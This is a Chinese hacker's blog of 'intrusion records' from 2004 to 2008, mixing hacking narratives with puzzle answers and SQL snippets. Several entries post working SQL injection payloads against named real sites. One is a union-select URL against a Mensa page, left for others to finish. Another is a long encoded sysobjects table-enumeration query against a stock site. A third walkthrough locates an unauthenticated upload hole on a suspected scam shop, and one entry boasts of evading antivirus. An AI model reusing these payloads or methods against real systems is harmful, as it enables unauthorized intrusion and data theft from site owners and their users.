wolfeng's blog - 入侵实录

六间房的裂缝

web-wind@163.com (wolfeng) — Fri, 11 Jul 2008 15:40:25 +0800

引子
世界上没有无缘无故的恨，也没有无缘无故的爱。这句话推而广之，世界上没有无缘无故的漏洞检测——或许是因为对方的名号，或许是因为对方的软件版本，或许是你的一次随机扫描，但就在这随机中也包含了某种必然：那个对象一定是暗合了你的某些扫描规则，才被选中的。而我对六间房的检测，则缘起于他们承办的一个“长城精灵拼图”的游戏。想了解具体恩怨的同志可以访问 http://www.seeknot.com/6windows/Sort.asp?SortID=9，我就不再这里骗稿费了。总而言之，就是我在这个活动中受到了极大的不公平。她们承认了错误，却拒绝纠正错误，直到最后杳无音信。我跟他们联系的重要手段之一，就是站内信。我幻想某天打开站内信，看到他们迟到的回复……

站内信的身份认证漏洞
对待幻想，可以有两种态度。一种是任其幻灭，一种是主动实现。后者正是hacker精神的精髓所在。要想实现我上述的情景，就必须找到六间房可能存在的身份验证方面的漏洞，或者干脆找到管理员的密码。虽然我的懒散一直在找借口：“这么大的网站会存在这么重大的漏洞吗？” 但是我的习惯还是让我打开了WSockExpert，同时耳边响起天下无贼里黎叔的台词：我想试试。
首先，我用wolfengster这个id向我新注册的6windows的id发送了一条站内信，标题是test，内容是 test by wolfeng，用WSockExpert监听的详细数据包如下：

微软密码风暴答案（全）

web-wind@163.com (wolfeng) — Mon, 02 Jun 2008 12:02:35 +0800

第七关是靠这个文章才过去的，转贴过来：
http://219.239.88.88/mspuzzle/

开始游戏钱别忘了输入你的mail，以便参与最后抽奖，奖品好像有笔记本什么的，还算丰厚。好了开始游戏了。

第一题：

解答：提示有两个，第一：密码不是数字；第二：笔记本很难做出答案。有了这两提示就简单了，我们会想笔记本和台式机哪里不同？貌似键盘小了个尺寸，对。是小键盘。所以把上面的数字在小键盘里比划吧！再想密码不是数字，那肯定是字母了。所以答案是：CODE

第二题：

解答：提示为“二进制转换为十进制”所以首先将以上二进制转换为 207.46.192.254，转换后发现为IP地址，联系提示是公司的名称，可以想到便是微软了，将IP输入地址栏，果然是microsoft，所以答案便是：microsoft

关于门萨的未完成注入

web-wind@163.com (wolfeng) — Sat, 08 Sep 2007 14:45:37 +0800

昨天看到鲁豫有约里采访几个中国的门萨成员，之后一时无聊，去了她们的官网，程序上有漏洞，但是却猜不到表名，load_file不到绝对路径而停滞不前，最大的无奈莫过于此，或许有人能猜到他的用户表吧，把注入点贴出来：http://www.mensa.org/nationalinfo.php?country=19%20and%201=2%20union%20select%201,user(),database(),4,5,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

易才网的漏洞

web-wind@163.com (wolfeng) — Thu, 27 Apr 2006 13:24:45 +0800

前几天去应聘易才网的项目经理，他们让我写一个对易才网的个人意见。本来不想写了，不过经不住那边催促，勉强写了一篇，大部分的篇幅是对一个隐藏得比较深的漏洞的描述，昨天看的时候他们已经改了程序（这不代表就没了漏洞），所以把报告贴出来：
总体来说，易才网结构合理，相应的电话确认用户身份的服务也很到位，我主要说几个问题，提几个建议。
问题一：冗余数据错乱
典型表现：http://augustsummer.blog.job1998.com/blog/index.asp
在该blog内的不同栏目里先后出现了郭先生的个人空间，郭小姐的个人空间，郭川的个人空间三个称谓。

最短的asp病毒

web-wind@163.com (wolfeng) — Fri, 03 Feb 2006 18:26:53 +0800

这是我去年5月份写的，今天归整到这里：
歇完长假第一天上班，被通知说公司的网站发现被攻击的痕迹，证据是诺顿的隔离区里发现若干病毒文件，用pcanywhere连上web一看，隔离区里躺着几个upload.inc文件，这不是我们大家广为传用的无惧上传类吗，我的bbs和涉及到无组件上传的地方都用他，无惧啊，挺好的，用了无惧，还真对得起咱这张脸（大宝广告毒害后遗症）。
打开bbs目录，果然upload.inc被杀掉了，在看一下诺顿的版本，5月4号升的级，看来是在upload.inc里包含了诺顿新命名的病毒特征码，无惧，我所欲也，诺顿亦我所欲也，只有改这个inc文件了，最初的做法比较速成，下了一个asp免杀工具，然后把upload.inc加密，再copy到web下，没有被查杀，正得意之时，又被人告知说上传功能仍无法使用，一看报错信息：page重复定义——原来如此，我的上传页面里包含了conn.asp 和upload.inc等文件， conn.asp的第一行：
<%@LANGUAGE="VBSCRIPT"%>
而upload.inc加密后也必定包含

利用seeknot入侵的一个实例

web-wind@163.com (wolfeng) — Fri, 30 Dec 2005 14:39:05 +0800

今天朋友给我一个卖保健品的网站，据说提交订单失效，疑似诈骗行为，遂查之。
   1、输入网址：http://www.bjp**.com，基本的安全做的不错，不存在简单的注入点，极有可能是一套开源的代码。
   2、登陆www.seeknot.com,利用其源码目录的查询功能反向查找源码名称，该网站有一新闻页面是：dongtai.asp，在www.seeknot.com输入dongtai.asp，列出6项源码，具体列表见：http://www.seeknot.com/result.asp?key=dongtai.asp&selected=1。
   3、进一步查询：该源码还有一页名称是fk.asp，在www.seeknot.com中输入fk.asp，其结果更上次结果取交集，确认源码为：秋叶购物商城V5.0(前台+后台演示+BBS) ，版本可能有出入。该源码的详细目录列表见：http://www.seeknot.com/showlist.asp?id=599
   4、下载秋叶购物系统源码，察看几个容易出现安全漏洞的关键点，发现存在类似动网6.0的上传漏洞，并且上传页面没有身份检测，即不用登陆，即可操作，上传页面为：http://www.bjp**.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg。

我的变态注入

web-wind@163.com (wolfeng) — Mon, 11 Oct 2004 16:53:37 +0800

今天我自虐的对一处sql注入点进行注入,把最后的一个注入贴出来,比较变态:
http://club.cinews.net/stock/stockdetail.asp?stockname=跑马地''and%20(Select%20Top%201%20name%20from%20sysobjects%20where%20xtype=char(85)%20and%20status>0%20%20and%20name<>%27%65%63%61%72%64%6D%65%73%73%61%67%65%27%20and%20name<>%27%61%71%5F%73%63%6F%72%65%27%20and%20name<>%27%42%61%64%4C%69%73%74%27%20and%20name<>%27%42%61%6E%6B%55%73%65%72%4C%69%73%74%27%20and%20name<>%27banzhu%27%20and%20name<>%27card%27%20and%20name<>%27cdd_score%27%20and%20name<>%27chess_score%27%20and%20name<>%27cyfd%27%20and%20name<>%27dahu%27%20and%20name<>%27ddz_score%27%20and%20name<>%27ecard%27%20and%20name<>%27ecardlead%27%20and%20name<>%27face%27%20and%20name<>%27facelist%27%20and%20name<>%27friend%27%20and%20name<>%27friendlist%27%20and%20name<>%27geter%27%20and%20name<>%27gift%27%20and%20name<>%27goodslist%27%20and%20name<>%27guesslist%27%20and%20name<>%27gupiaoconfig%27%20and%20name<>%27gz_score%27%20and%20name<>%27job%27%20and%20name<>%27jq_score%27%20and%20name<>%27kehu%27%20and%20name<>%27message%27%20and%20name<>%27mj_score%27%20and%20name<>%27movice%27%20and%20name<>%27news%27%20and%20name<>%27pdk_score%27%20and%20name<>%27propertys%27%20and%20name<>%27sgjq_score%27%20and%20name<>%27stock%27%20and%20name<>%27stockbuylist%27%20and%20name<>%27stocklist%27%20and%20name<>%27stocknews%27%20and%20name<>%27sysmsg%27%20and%20name<>%27tlj_score%27%20and%20name<>%27user8%27%20and%20name<>%27userinfo%27%20and%20name<>%27users%27%20and%20name<>%27wq_score%27%20and%20name<>%27wzq_score%27%20and%20name<>%27xq_score%27%20and%20name<>%27yuelao%27)>0%20;--

说明一下:上面注入是探测sql内的所有数据表,型如and name <>%27card%27 之类的东西,是我一步一步的加的,加一个出一个表,呵呵,比较笨,笨死了,但是我喜欢.

sql中的一个私人案例（to 小邵）

web-wind@163.com (wolfeng) — Fri, 08 Oct 2004 13:38:01 +0800

功能：把test表中缺失的identity属性加上。
思路：把test表数据写如临时表，然后删除test表，重建test表，设置test的identity_insert为on，然后把临时表的数据导入test，直接在查询分析器了执行即可，呵呵。
select distinct * into #Tmp from test
drop table test
CREATE TABLE test (

identity的一个操作

web-wind@163.com (wolfeng) — Fri, 08 Oct 2004 11:27:40 +0800

A. 如有必要，重置当前标识值
下例在必要的情况下重置 jobs 表的当前标识值。

USE pubs
GO

俺的sql注入程序

web-wind@163.com (wolfeng) — Tue, 28 Sep 2004 09:13:19 +0800

差不多两年前，sql injection刚刚浮出水面的时候，我用asp写了一个探测敏感字符串的冬冬，挂在我的网站上四处注入，虽然简陋，却立功无数。如今大量的sql 注入工具相继问世，我也该把这段注入代码贴出来而无须敝帚自珍了，^_^。
思路很简单，建立对象Microsoft.XMLHTTP，通过它的send方法发送请求，通过responseBody判断返回的页面信息来完成对字符串的猜测，
需要注意的是通常我么访问的网页上有字母也有汉字，所以要对返回信息处理一下，写一个byte2BSTR函数：

Function bytes2BSTR(vIn)